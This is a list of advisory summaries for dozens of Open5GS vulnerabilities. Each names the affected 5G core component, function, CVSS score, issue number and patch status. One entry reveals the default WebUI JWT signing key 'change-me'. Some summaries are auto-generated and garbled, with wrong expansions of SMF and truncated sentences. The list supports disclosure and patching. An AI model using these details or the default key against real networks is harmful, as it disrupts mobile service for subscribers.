Denial of service in Open5GS NRF (Network Repository Function) allows authenticated remote attackers to crash the service by exhausting the nf_service resource pool. Open5GS versions up to 2.7.7 fail to validate pool allocation during NF service registration, triggering assertion failures that terminate the process. Publicly available exploit code exists (GitHub issue #4466). EPSS data not available, not listed in CISA KEV. Patch released via commit 819db11a08b9736a3576c4f99ceb28f7eb99523a, merged in PR #4534.
Improper authorization in Open5GS AMF/MME component (versions up to 2.7.6) allows authenticated network attackers to manipulate NGAP user context lookups, potentially accessing or interfering with other users' 5G/LTE sessions. The vulnerability stems from insufficient validation of AMF_UE_NGAP_ID and RAN_UE_NGAP_ID pairs in the ran_ue_find_by_amf_ue_ngap_id function, enabling attackers with low-level network privileges to bypass session-to-base-station association controls. Publicly available exploit code exists (GitHub issue #4498), and a vendor-released patch (commit 5746b857) is available. CVSS 6.3 (Medium) reflects network vector with low attack complexity but requires authentication.
Denial of service vulnerability in Open5GS NRF client management (versions ≤2.7.7) allows authenticated remote attackers to crash the Network Repository Function service via malformed client pool arguments. Public exploit code exists (GitHub issue #4464), but vendor has not responded to disclosure. CVSS base score of 4.3 reflects low severity due to limited availability impact and authentication requirement. EPSS data not provided; KEV status not applicable for this unpatched issue.
Denial of service in Open5GS versions up to 2.7.6 allows authenticated remote attackers to crash the Network Repository Function (NRF) component via crafted nfInstanceId parameter manipulation in the ogs_sbi_nf_instance_set_id function. Publicly available exploit code exists (GitHub issue #4462), but vendor has not responded to early responsible disclosure. EPSS data not available, not listed in CISA KEV. CVSS 4.3 (Medium) reflects low impact (availability only) and authenticated attack vector.
Denial of service in Open5GS versions up to 2.7.7 allows authenticated remote attackers to crash the Network Repository Function (NRF) component by manipulating service-names or snssais parameters in SBI messages. A public proof-of-concept exploit exists via GitHub issue #4460, and the vendor has not responded to the early disclosure. EPSS data unavailable, but the low CVSS 4.3 score reflects limited impact (availability only, authenticated access required), reducing real-world urgency for most deployments.
Denial of service in Open5GS versions up to 2.7.7 allows authenticated remote attackers to crash the Network Repository Function (NRF) component via malformed target-plmn-list parameters. The vulnerability targets a parsing function in the Service-Based Interface (SBI) library and has publicly available exploit code (GitHub issue #4458). CVSS 4.3 reflects low severity, but the vendor has not responded to early disclosure attempts, leaving no confirmed patch timeline. EPSS and KEV data unavailable - exploitation likelihood beyond POC unknown.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the NRF component by manipulating the hnrf-uri argument passed to the yuarel_parse function in /lib/sbi/conv.c. The vulnerability has a publicly available exploit and low CVSS score (4.3) due to authentication requirement and limited scope, but affects a critical 5G network function with potential operational impact.
Denial of service in Open5GS NRF component up to version 2.7.7 allows remote authenticated attackers to exhaust the nf_service memory pool via the ogs_nnrf_nfm_handle_nf_profile function, causing the process to abort via failed assertion. Publicly available exploit code exists, and a vendor patch is available but awaits acceptance into the main branch.
Denial of service in Open5GS through version 2.7.7 allows authenticated remote attackers to crash the Service Management Function (SMF) by manipulating the smf_nsmf_handle_update_data_in_vsmf function in nsmf-handler.c. Publicly available exploit code exists, and the project maintainers have not yet responded to the early disclosure notification despite awareness of the issue.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) by manipulating the qosFlowProfile argument in the smf_nsmf_handle_update_data_in_vsmf function. Publicly available exploit code exists, and the vulnerability affects the 5G core network's ability to manage quality-of-service parameters, though the project maintainers have not yet responded to early disclosure.
Denial of service in Open5GS SMF (Session Management Function) via crafted PDU Session Modification messages allows remote authenticated attackers to trigger unvalidated parameter processing in gsm_handle_pdu_session_modification_qos_flow_descriptions(), causing service disruption. The vulnerability stems from insufficient pre-validation of QoS flow parameter identifiers and bitrate units before state mutation, potentially leaving the SMF in an inconsistent state. Publicly available exploit code exists, and a fix awaits upstream acceptance in PR #4513.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) via manipulation of QoS rule parsing in the ogs_nas_parse_qos_rules function. The vulnerability has a low CVSS score of 2.1 but public exploit code is available; however, exploitation requires prior authentication and causes only availability impact without confidentiality or integrity compromise.
Denial of service vulnerability in Open5GS up to version 2.7.7 affects the SMF (Session Management Function) component's smf_nsmf_handle_create_sm_context function, allowing authenticated remote attackers to crash or degrade the 5G core network service through malformed session context creation requests. Public exploit code exists and the vulnerability has low real-world severity (CVSS 2.1) due to requirement for authenticated access and availability impact only, though active 5G infrastructure targeting remains a concern given the critical nature of SMF in telecom deployments.
Denial of service in Open5GS up to version 2.7.7 affects the SMF component's OpenAPI_list_create function, allowing authenticated remote attackers to cause service unavailability through resource manipulation. The vulnerability has low to moderate severity (CVSS 4.3) with publicly disclosed proof-of-concept code, though the vendor has not yet responded to early disclosure notification.
Remote authenticated denial of service in Open5GS up to version 2.7.7 affects the SMF (Session Management Function) component, specifically in the smf_nsmf_handle_created_data_in_vsmf function. An authenticated attacker can remotely trigger a denial of service condition by sending crafted requests. Public exploit code is available (CVE-2026-8267 GitHub issue #4448), though the vendor has not yet released a patched version despite early notification.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Service Management Function (SMF) via manipulation of the PDU session establishment acceptance function, resulting in service unavailability. The CVSS score of 4.3 reflects low severity due to authentication requirements and availability-only impact, though publicly available exploit code exists and the vulnerability has been reported to the project without acknowledged response.
Null pointer dereference in Open5GS Session Management Function (SMF) up to version 2.7.7 allows authenticated remote attackers to cause denial of service by manipulating the smf_nsmf_handle_create_data_in_hsmf function. Publicly available exploit code exists, and the project has been notified but has not yet released a patch.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Service Mobile Function (SMF) component via manipulation of the update_authorized_pcc_rule_and_qos function in the Policy and Charging Control (PCC) handler. The vulnerability has a CVSS score of 2.1 with low availability impact; publicly available exploit code exists, and the project maintainers have not yet responded to early disclosure.
Denial of service in Open5GS up to version 2.7.7 via the smf_n4_build_qos_flow_to_modify_list function in the SMF (Session Management Function) component allows remote authenticated attackers to crash the service with low attack complexity. The vulnerability has been publicly disclosed with exploit code available; the vendor was notified early but has not yet released a fix.
Denial of service vulnerability in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Service Measurement Function (SMF) component via improper handling in the update_authorized_pcc_rule_and_qos function. The vulnerability has a publicly available exploit and moderate CVSS score (4.3) but is limited to authenticated access and results in availability impact only. The vendor has not yet released a patch despite early notification through a GitHub issue.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Service Mobility Function (SMF) component via manipulation of the update_authorized_pcc_rule_and_qos function in npcf-handler.c. Publicly available exploit code exists, and the vendor has not released a patch despite early notification through issue tracking.
Denial of service vulnerability in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the service by triggering improper exception handling in the ogs_pcc_rule_install_flow_from_media function within the PCC rule processing library. Publicly available exploit code exists, and the project maintainers have not responded to the early notification despite issue tracking.
Denial of service in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the Policy Control Function (PCF) by manipulating the SmPolicyContextData.ipv6AddressPrefix parameter in the pcf_sess_set_ipv6prefix function. The vulnerability has publicly available exploit code and was disclosed despite vendor non-responsiveness, making it a known attack vector against 5G service provider infrastructure.
Denial of service in Open5GS up to version 2.7.7 via manipulation of the pcf_sess_sbi_discover_and_send function in the sm-policies endpoint allows remote unauthenticated attackers to disrupt service availability. Publicly available exploit code exists, and the upstream project has not yet issued a patch despite early notification via issue report.
Remote denial of service in Open5GS up to version 2.7.7 affects the sm-policies endpoint's pcf_nbsf_management_handle_register function, allowing unauthenticated network attackers to trigger a crash or service disruption with low attack complexity. Publicly available exploit code exists and the vendor was notified early but has not released a fix.
Denial of service in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the Policy Control Function (PCF) service by sending crafted requests to the delete endpoint in the SM policy control handler (pcf_npcf_smpolicycontrol_handle_delete). The vulnerability has a publicly available proof of concept and impacts the availability of 5G network policy enforcement, though the vendor has not yet released a patch despite early notification.
Out-of-bounds read in Open5GS up to version 2.7.7 allows remote attackers to trigger information disclosure via manipulation of the ogs_sbi_client_send_via_scp_or_sepp function in lib/sbi/client.c during Service-Based Interface (SBI) communication. The vulnerability exploits improper bounds checking when extracting paths from URIs, affecting the Network Function (NF) component. CVSS 6.9 (network-accessible, low complexity, no privileges required) with availability impact. Upstream patch commit d5bc487fcf9ea87d2b03f2ef95123af344773bfb available.
Denial of service in Open5GS User Plane Function (UPF) up to version 2.7.7 allows remote, unauthenticated attackers to exhaust server resources through manipulation of GTPv1-U packet handling in the _gtpv1_u_recv_cb function. The vulnerability enables resource consumption attacks against 5G core network infrastructure without requiring authentication or user interaction. Vendor notification occurred via GitHub issue #4492 but has not received developer response or a released patch.
Denial of service in Open5GS up to version 2.7.7 affects the NSSF component's ogs_sbi_discovery_option_add_snssais function, allowing authenticated remote attackers to crash the service via a network request. The vulnerability has been publicly disclosed with exploit code available on GitHub, though the vendor has not yet responded to early notification.
Denial of service vulnerability in Open5GS up to version 2.7.7 affects the NSSF component's service discovery function, allowing remote authenticated attackers to cause availability impact through manipulation of the ogs_sbi_discovery_option_add_service_names function. Public exploit code exists and the vulnerability carries low CVSS score (2.1) reflecting limited impact scope, though the project has not yet responded to early notification.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the NSSF (Network Slice Selection Function) component via a crafted PLMN list in the SBI (Service Based Interface) parser. The vulnerability exists in the ogs_sbi_parse_plmn_list function within /lib/sbi/conv.c and has been publicly disclosed with exploit code available; the vendor has not yet released a patch despite early notification.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to manipulate the NSSF network selection function via the nssf_nnrf_nsselection_handle_get_from_amf_or_vnssf handler in /src/nssf/nnssf-handler.c, causing service unavailability. Public exploit code exists and the vulnerability has been reported to the project, though no patch has been released as of analysis time.
Denial of service in Open5GS up to version 2.7.7 affects the NSSF component's stream identification function in the nghttp2-server library. Local authenticated attackers can manipulate the ogs_sbi_stream_find_by_id function to cause service unavailability. Publicly available exploit code exists, though the vendor has not yet responded to early disclosure notification.
Denial of service in Open5GS up to version 2.7.7 affects the AMF 3GPP access endpoint handler (udm_nudm_uecm_handle_amf_registration_update function), allowing authenticated remote attackers to crash the UDM service via malformed registration update messages. Publicly available exploit code exists, and the vendor was notified early but has not released a patch as of the analysis date.
Denial of service in Open5GS up to version 2.7.7 affects the udm_state_operational function in the smf-registrations endpoint, allowing authenticated remote attackers to manipulate the function and cause service unavailability. The vulnerability has publicly available exploit code and carries a low CVSS score of 2.1 due to required authentication and limited availability impact, though the project has not yet responded to early disclosure.
Denial of service in Open5GS up to version 2.7.7 affects the authentication-subscription endpoint handler, allowing authenticated remote attackers to manipulate the udm_nudr_dr_handle_subscription_authentication function and cause service unavailability. Public exploit code exists and the vulnerability has been reported to the project without a confirmed vendor response or patch release.
Denial of service in Open5GS UDR component up to version 2.7.7 allows authenticated remote attackers to crash the subscription data service by manipulating the supi_id argument to the ogs_dbi_subscription_data function. Publicly available exploit code exists, and the vendor has been notified via issue report but has not yet released a patch.
Denial of service in Open5GS UDR component (versions up to 2.7.7) via malformed pei argument in udr_nudr_dr_handle_subscription_context function allows authenticated remote attackers to crash the User Data Repository service with low complexity. Publicly available exploit code exists; vendor has not responded to early notification.
Denial of service in Open5GS versions up to 2.7.7 allows authenticated remote attackers to crash the AMF (Access and Mobility Management Function) component by exploiting improper error handling in the gmm_handle_service_request function. The vulnerability requires low-privilege authentication to trigger and results in service unavailability. A public exploit has been disclosed via GitHub issue tracker, though the vendor has not yet released a patch despite early notification.
Denial of service in Open5GS AMF (Access and Mobility Function) up to version 2.7.6 allows authenticated remote attackers to cause service unavailability by sending crafted registration requests with manipulated reg_type arguments. The vulnerability exists in the GMM (Mobility Management) handler due to insufficient validation of registration type values, potentially triggering null pointer dereferences or assertion failures. Vendor-released patch version 2.7.7 is available.
Denial of service in Open5GS AMF component up to version 2.7.7 allows authenticated remote attackers to trigger resource exhaustion via improper handling of PDU session context update messages in the amf_nsmf_pdusession_handle_update_sm_context function. The vulnerability has a low CVSS score (2.1) but publicly available exploit code exists; however, exploitation requires prior authentication to the 5G network, significantly limiting real-world attack surface.
Denial of service in Open5GS up to version 2.7.7 affects the AMF (Access and Mobility Function) component, specifically the ogs_id_get_value function in nudm-handler.c, allowing remote authenticated attackers to cause service unavailability. Publicly available exploit code exists, and the vulnerability has been reported to the project via GitHub issue #4405 without vendor acknowledgment or patch release at time of analysis.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the AMF (Access and Mobility Management Function) component via manipulation of the amf_nudm_sdm_handle_provisioned function in the NUDM handler. The vulnerability has publicly available exploit code and affects the authentication and mobility management core of 5G networks, requiring valid credentials to trigger but resulting in service unavailability. Public disclosure has occurred without vendor remediation at the time of analysis.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the BSF (Binding Support Function) component by manipulating the ipv6Prefix argument in the bsf_sess_find_by_ipv6prefix function. The vulnerability has a low CVSS score of 2.1 due to requiring authentication and causing only availability impact, but publicly available exploit code exists and the vendor has not yet responded to early disclosure.
Denial of service in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the BSF (Binding Support Function) service by manipulating the ipv4Addr parameter in the /nbsf-management/v1/pcfBindings endpoint. The vulnerability has publicly available exploit code and affects a core 5G network function, creating operational risk for mobile networks relying on this open-source implementation.
Denial of service in Open5GS 2.7.6 via malformed CCA (Credit-Control-Answer) messages in the SMF (Session Management Function) component allows remote attackers to crash the service without authentication. The vulnerability affects the smf_gx_cca_cb, smf_gy_cca_cb, and smf_s6b functions in the CCA Message Handler, with publicly available exploit code demonstrating the attack despite high complexity requirements. CVSS 6.3 reflects the availability impact and remote attack vector, though exploitation requires crafted network conditions.
Denial of service in Open5GS through version 2.7.6 affects the CCA Handler component's callback functions, allowing unauthenticated remote attackers to crash the service. Public exploit code is available for this vulnerability. Upgrading to version 2.7.7 resolves the issue.
Open5GS 2.7.6 is vulnerable to denial of service through improper handling of S11 session response messages in the MME component, allowing remote unauthenticated attackers to crash the service. Public exploit code exists for this vulnerability, and the vendor has not yet provided a patch despite early notification.
Open5GS versions up to 2.7.6 are vulnerable to a denial of service condition in the SMF component's PDP context request handler, which can be triggered remotely without authentication. An attacker can exploit this reachable assertion flaw to crash the service, and public exploit code is currently available. No patch has been released by the project despite early notification of the issue.
Memory corruption in Open5GS up to version 2.7.6 allows remote attackers to cause denial of service through manipulation of the MME component's esm-build.c file. Public exploit code exists for this vulnerability, and the Open5GS project has not yet released a patch despite early notification.
Memory corruption in Open5GS versions up to 2.7.6 allows remote attackers to trigger a denial of service condition by manipulating the SGW-C session creation handler, with public exploit code already available. The vulnerability requires no authentication or user interaction and currently lacks a vendor patch, leaving affected deployments vulnerable to remote availability attacks.
Open5GS versions up to 2.7.6 are vulnerable to a denial of service attack in the SMF component's TFT parsing function when a crafted packet manipulates the traffic filter content length parameter. An unauthenticated remote attacker can trigger this flaw to crash the service, and public exploit code exists with no patch currently available.
Open5GS versions up to 2.7.6 suffer from a null pointer dereference in the PGW S5U Address Handler component that can be triggered remotely without authentication, resulting in denial of service. Public exploit code exists for this vulnerability, and administrators should apply the available patch immediately.
A security flaw has been discovered in Open5GS up to 2.7.6. Affected by this vulnerability is the function hss_ogs_diam_cx_mar_cb of the file src/hss/hss-cx-path.c of the component VoLTE Cx-Test. [CVSS 7.3 HIGH]
Remote denial of service in Open5GS up to version 2.7.6 allows unauthenticated attackers to trigger a reachable assertion in the SGWC component by manipulating PDR arguments in the sgwc_tunnel_add function. Public exploit code exists for this vulnerability, and no patch is currently available despite reports indicating a fix is planned.
Open5GS versions up to 2.7.6 contain a reachable assertion vulnerability in the CreateBearerRequest handler that allows unauthenticated remote attackers to trigger a denial of service condition. Public exploit code exists for this vulnerability, and no patch is currently available. The impact is limited to service availability, with a CVSS score of 5.3.
Open5GS versions up to 2.7.6 contain a reachable assertion vulnerability in the SGWC S11 handler that can be triggered remotely without authentication to cause a denial of service. Public exploit code exists for this vulnerability, and while a patch is reported as already-fixed, it remains unavailable for affected deployments.
Denial of service in Open5GS up to version 2.7.6 allows remote attackers to crash the SGWC service by manipulating the Modify Bearer Request handler in s11-handler.c. Public exploit code exists for this vulnerability and no patch is currently available. Organizations running affected versions should apply updates as they become available and consider network-level mitigations to restrict access to the S11 interface.
Remote denial of service in Open5GS up to version 2.7.5 affects the SGWC component's TEID-to-IP conversion function, allowing unauthenticated attackers to crash the service over the network. Public exploit code exists for this vulnerability, and while a fix has been developed, no official patch is currently available for affected deployments.
Remote denial of service in Open5GS up to version 2.7.6 affects the SGWC component's bearer response handler, allowing unauthenticated attackers to crash the service over the network. Public exploit code exists for this vulnerability, though a patch (commit b19cf6a) is available to resolve it.
Remote denial of service in Open5GS up to version 2.7.6 allows unauthenticated attackers to crash the SGWC component by manipulating bearer resource failure indication messages. Public exploit code exists for this vulnerability, and a patch is available in commit 69b53add90a9479d7960b822fc60601d659c328b.
Open5gs WebUI authentication can be bypassed by attackers who exploit the default hardcoded JWT signing key ("change-me") that is used when the JWT_SECRET_KEY environment variable is not configured. An attacker can forge valid JWT tokens to gain unauthorized access to the WebUI with limited confidentiality and integrity impacts. A patch is available to remediate this vulnerability by enforcing proper key configuration or using secure defaults.
A vulnerability was determined in Open5GS up to 2.7.6. Impacted is the function sgwc_s11_handle_downlink_data_notification_ack of the file src/sgwc/s11-handler.c of the component sgwc. [CVSS 5.3 MEDIUM]
A security flaw has been discovered in Open5GS up to 2.7.5. This issue affects some unknown processing of the component Timer Handler. [CVSS 5.3 MEDIUM]
A vulnerability was identified in Open5GS up to 2.7.5. This vulnerability affects the function sgwc_bearer_add of the file src/sgwc/context.c. [CVSS 5.3 MEDIUM]
A vulnerability was determined in Open5GS up to 2.7.6. This affects the function sgwc_s11_handle_create_indirect_data_forwarding_tunnel_request of the file /src/sgwc/s11-handler.c. [CVSS 5.3 MEDIUM]
A vulnerability was found in Open5GS up to 2.7.6. Affected by this issue is the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c. [CVSS 5.3 MEDIUM]
A vulnerability has been found in Open5GS up to 2.7.6. Affected by this vulnerability is an unknown functionality of the component GTPv2 Bearer Response Handler. [CVSS 5.3 MEDIUM]
A weakness has been identified in Open5GS up to 2.7.6. Affected by this issue is the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c of the component GTPv2-C Flow Handler. [CVSS 3.3 LOW]
A security flaw has been discovered in Open5GS up to 2.7.6. Affected by this vulnerability is the function ogs_gtp2_parse_bearer_qos in the library lib/gtp/v2/types.c of the component Bearer QoS IE Length Handler. [CVSS 3.3 LOW]
A vulnerability was identified in Open5GS up to 2.7.6. Affected is the function sgwc_s11_handle_create_session_request of the file src/sgwc/s11-handler.c of the component GTPv2-C F-TEID Handler. [CVSS 3.3 LOW]
Improper initialization in the PFCP handler function ogs_pfcp_handle_create_pdr within Open5GS up to version 2.7.5 allows remote attackers to trigger information disclosure with high attack complexity. The vulnerability has a publicly available proof-of-concept and carries a very low EPSS score (0.15%), indicating minimal real-world exploitation probability despite public availability of exploit code. CVSS 2.9 reflects the limited technical impact (availability of confidentiality only), but the high complexity and resource requirements make practical attacks difficult.
Reachable assertion in Open5GS up to version 2.7.6 affects the PFCP context management functions (PDR, FAR, URR, QER) in lib/pfcp/context.c, allowing remote attackers to trigger a denial of service condition via crafted PFCP messages. The vulnerability requires high attack complexity and has low availability impact, but publicly available exploit code exists. CVSS 2.9 / EPSS 0.14% indicates low real-world exploitation probability despite public POC.
Null pointer dereference in Open5GS up to version 2.7.5 allows remote authenticated attackers to cause denial of service by sending manipulated PFCP (Packet Forwarding Control Protocol) packets that trigger improper handling in the FAR-ID handler component. The vulnerability requires high attack complexity and authenticated access, limiting real-world exploitation despite publicly available proof-of-concept code and a low CVSS score of 1.3 reflecting restricted impact scope.
In Open5GS 2.7.6, AMF crashes when receiving an abnormal NGSetupRequest message, resulting in denial of service. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. This Uncontrolled Resource Consumption vulnerability could allow attackers to cause denial of service by exhausting system resources.
Open5GS v2.7.5, prior to commit 67ba7f92bbd7a378954895d96d9d7b05d5b64615, is vulnerable to a NULL pointer dereference when a multipart/related HTTP POST request with an empty HTTP body is sent to the. Rated medium severity (CVSS 4.0), this vulnerability is no authentication required, low attack complexity. Public exploit code available.
An issue in Open5GS v2.7.2 and before allows a remote attacker to cause a denial of service via a crafted Create Session Request message to the SMF (PGW-C), using the IP address of a legitimate UE in. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Assertion failure in function ngap_build_downlink_nas_transport in file src/amf/ngap-build.c, the Access and Mobility Management Function (AMF) component, in Open5GS thru 2.7.5 allowing attackers to. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.
A security flaw has been discovered in Open5GS up to 2.7.5. Rated medium severity (CVSS 5.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.
A vulnerability was determined in Open5GS up to 2.7.5. Rated medium severity (CVSS 5.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.
A vulnerability was found in Open5GS up to 2.7.5. Rated medium severity (CVSS 5.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.